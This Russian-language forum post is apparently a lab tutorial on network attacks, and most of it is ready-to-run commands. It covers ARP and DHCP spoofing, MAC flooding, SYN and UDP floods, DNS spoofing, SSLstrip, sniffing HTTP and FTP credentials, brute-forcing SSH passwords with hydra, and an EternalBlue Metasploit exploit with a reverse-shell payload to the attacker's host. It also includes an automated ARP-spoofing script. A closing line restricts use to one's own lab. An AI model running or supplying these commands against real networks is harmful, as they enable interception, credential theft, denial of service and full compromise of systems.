&&&&&&

by Administrator ·2026-07-02 06:51:13 ·1 replies ·2 views
#71
🌐 ПРАКТИКА СЕТЕВЫХ АТАК И ПРОТОКОЛОВ
Лабораторная среда

Для практики тебе понадобятся:

Kali Linux (твоя машина)

Целевая машина: Metasploitable 2, Windows XP/7, или любая другая VM в той же сети.

Сеть: Все машины должны быть в одной локальной сети (NAT или Host-Only в VirtualBox).

1. РАЗВЕДКА СЕТИ
1.1. Определение своего IP и сети

Узнай свой IP:
bash

ip a
ifconfig

Узнай шлюз по умолчанию:
bash

route -n
ip route

Определи MAC-адрес:
bash

arp -a
ip neigh

1.2. Сканирование сети

Ping-сканирование (определение живых хостов):
bash

nmap -sn 192.168.1.0/24

Определение ОС и версий служб:
bash

nmap -sV -sC -O 192.168.1.10

Сканирование всех портов (медленно, но тщательно):
bash

nmap -p- 192.168.1.10

Обнаружение скрытых служб (UDP):
bash

nmap -sU -p 53,67,68,69,123,161,162 192.168.1.10

Сканирование с использованием SYN-пакетов (полуоткрытое, скрытное):
bash

nmap -sS -p 80,443,22,21,25 192.168.1.10

1.3. Обнаружение служб вручную

Проверка открытых портов через Netcat:
bash

nc -zv 192.168.1.10 22
nc -zv 192.168.1.10 80

Баннеры служб:
bash

nc 192.168.1.10 22
nc 192.168.1.10 80
HEAD / HTTP/1.0

2. АТАКИ НА АРХИТЕКТУРУ СЕТИ (L2/L3)
2.1. ARP-спуфинг (MITM)

Включи IP-форвардинг (чтобы пересылать трафик):
bash

echo 1 > /proc/sys/net/ipv4/ip_forward

Отравь ARP-таблицу шлюза (IP_ШЛЮЗА = 192.168.1.1, IP_ЖЕРТВЫ = 192.168.1.10):
bash

arpspoof -i eth0 -t 192.168.1.1 192.168.1.10

Отравь ARP-таблицу жертвы:
bash

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

Перехватывай трафик (в отдельном терминале):
bash

tcpdump -i eth0 -w capture.pcap

Анализируй трафик в Wireshark:
bash

wireshark capture.pcap

Остановка:
Нажми Ctrl+C в каждом терминале с arpspoof. Восстанови ARP-таблицы:
bash

arp -d 192.168.1.1
arp -d 192.168.1.10

2.2. DHCP Spoofing

Запусти поддельный DHCP-сервер:
bash

dhcpd -cf /etc/dhcp/dhcpd.conf -lf /var/lib/dhcp/dhcpd.leases eth0

Настрой конфиг /etc/dhcp/dhcpd.conf:
text

subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.150;
option routers 192.168.1.5; # Твой IP
option domain-name-servers 8.8.8.8;
}

Результат: Все новые устройства в сети получат IP от тебя и будут использовать тебя как шлюз.
2.3. MAC Flooding (Переполнение CAM-таблицы)

Запусти MAC Flooding (требует macof из пакета dsniff):
bash

macof -i eth0 -d 192.168.1.10

Результат: Коммутатор перестаёт работать как коммутатор и начинает транслировать трафик на все порты (атака на канальный уровень).

Остановка: Ctrl+C.
3. АТАКИ НА ТРАНСПОРТНЫЙ УРОВЕНЬ (L4)
3.1. SYN-флуд (DoS)

Атака с помощью hping3:
bash

hping3 -S -p 80 --flood 192.168.1.10

Атака с помощью Nmap:
bash

nmap -p 80 --max-rtt-timeout 100ms --max-scan-delay 10ms -sS 192.168.1.10

Результат: Сервер перестанет отвечать на легитимные запросы.
3.2. TCP RST-атака (Сброс соединения)

Сбрось соединение между жертвой и сервером:
bash

tcpkill -i eth0 host 192.168.1.10 and port 80

Результат: Все TCP-соединения на порт 80 будут разорваны.
3.3. UDP-флуд
bash

udpflood -i eth0 192.168.1.10 123

Результат: Перегрузка UDP-сервиса (NTP, DNS).
4. АТАКИ "ЧЕЛОВЕК ПОСЕРЕДИНЕ" (MITM)
4.1. DNS Spoofing

Запусти поддельный DNS-сервер (используй dnsspoof):
bash

dnsspoof -i eth0 -f /etc/dnsspoof.conf

Настрой файл /etc/dnsspoof.conf:
text

*.target.com 192.168.1.5 # Все запросы к target.com идут на твой IP

Результат: Пользователи открывают поддельный сайт.
4.2. SSLstrip (Удаление HTTPS)

Запусти SSLstrip для перехвата HTTPS-трафика:
bash

sslstrip -l 8080 -k

Настрой IP-форвардинг и iptables:
bash

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

Результат: HTTPS-соединения превращаются в HTTP, и ты можешь видеть все данные.
5. АТАКИ НА ПРИКЛАДНОЙ УРОВЕНЬ (L7)
5.1. Перехват HTTP-трафика

В терминале с включенным IP-форвардингом:
bash

tcpdump -i eth0 -A -s 0 'tcp port 80'

Результат: Видишь все HTTP-запросы в текстовом виде (куки, пароли).
5.2. Подмена содержимого страницы (MITM + HTTP)

Используй webmitm (из пакета dsniff):
bash

webmitm -i eth0 -d 192.168.1.1

Результат: Ты можешь подменять содержимое страниц, которые загружает жертва.
5.3. Атака на FTP

Перехват FTP-логинов:
bash

tcpdump -i eth0 -A 'tcp port 21'

Или через Wireshark:
Открой Wireshark, фильтр: tcp.port == 21.
6. АТАКИ НА SSH
6.1. Брутфорс пароля SSH

Используй hydra:
bash

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10

Используй medusa:
bash

medusa -h 192.168.1.10 -u root -P /usr/share/wordlists/rockyou.txt -M ssh

6.2. Атака "человек посередине" на SSH (SSH MITM)

Запусти ssh-mitm (нужно установить):
bash

python3 ssh-mitm.py --remote-host 192.168.1.10

Результат: Ты перехватываешь SSH-сессии и можешь видеть команды.
7. АТАКИ НА SMB
7.1. Сканирование SMB-шаров
bash

nmap -p 445 --script=smb-enum-shares 192.168.1.10

7.2. Подключение к открытому шару
bash

smbclient -L //192.168.1.10
smbclient //192.168.1.10/share -N

7.3. Эксплуатация EternalBlue (CVE-2017-0144)

Используй Metasploit:
bash

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

Результат: Полный контроль над Windows-системой.
8. ПАССИВНЫЙ АНАЛИЗ ТРАФИКА
8.1. Перехват всех пакетов в сети
bash

tcpdump -i eth0 -w capture.pcap

8.2. Фильтрация по IP
bash

tcpdump -i eth0 host 192.168.1.10

8.3. Фильтрация по порту
bash

tcpdump -i eth0 port 80

8.4. Чтение сохранённого дампа
bash

tcpdump -r capture.pcap

9. ОБХОД БЛОКИРОВОК
9.1. Использование Tor

Установи и запусти Tor:
bash

sudo apt install tor
sudo systemctl start tor

Настрой прокси (используй proxychains):
bash

proxychains nmap -sS 192.168.1.10

9.2. Использование VPN
bash

openvpn --config vpn.ovpn

10. АВТОМАТИЗАЦИЯ
10.1. Скрипт для ARP-спуфинга

Создай файл arp_attack.sh:
bash

#!/bin/bash
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.1 192.168.1.10 &
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 &
tcpdump -i eth0 -w capture.pcap

Запуск:
bash

chmod +x arp_attack.sh
./arp_attack.sh

10.2. Скрипт для сканирования сети

Создай файл scan_network.sh:
bash

#!/bin/bash
echo "[*] Сканирование сети..."
nmap -sn 192.168.1.0/24 > alive_hosts.txt
for ip in $(grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' alive_hosts.txt); do
echo "[*] Сканирование $ip"
nmap -sV -p 22,80,443,445,3306 $ip >> scan_result.txt
done

ВЫВОДЫ

Ты имеешь полный набор инструментов и команд для:

Разведки сети (Nmap, Netcat).

Проведения MITM-атак (ARP, DHCP, DNS).

Атак на транспортный уровень (SYN-flood, RST).

Брутфорса сервисов (SSH, SMB).

Эксплуатации уязвимостей (EternalBlue).

Автоматизации через Bash-скрипты.

Помни: Все эти действия должны выполняться только в твоей лабораторной среде с письменного разрешения владельца сети. Нарушение этого правила является уголовным преступлением.

Практика: Разверни Metasploitable 2, WinXP и практикуйся на них. Это лучший способ закрепить навыки. Удачи.

Login to reply.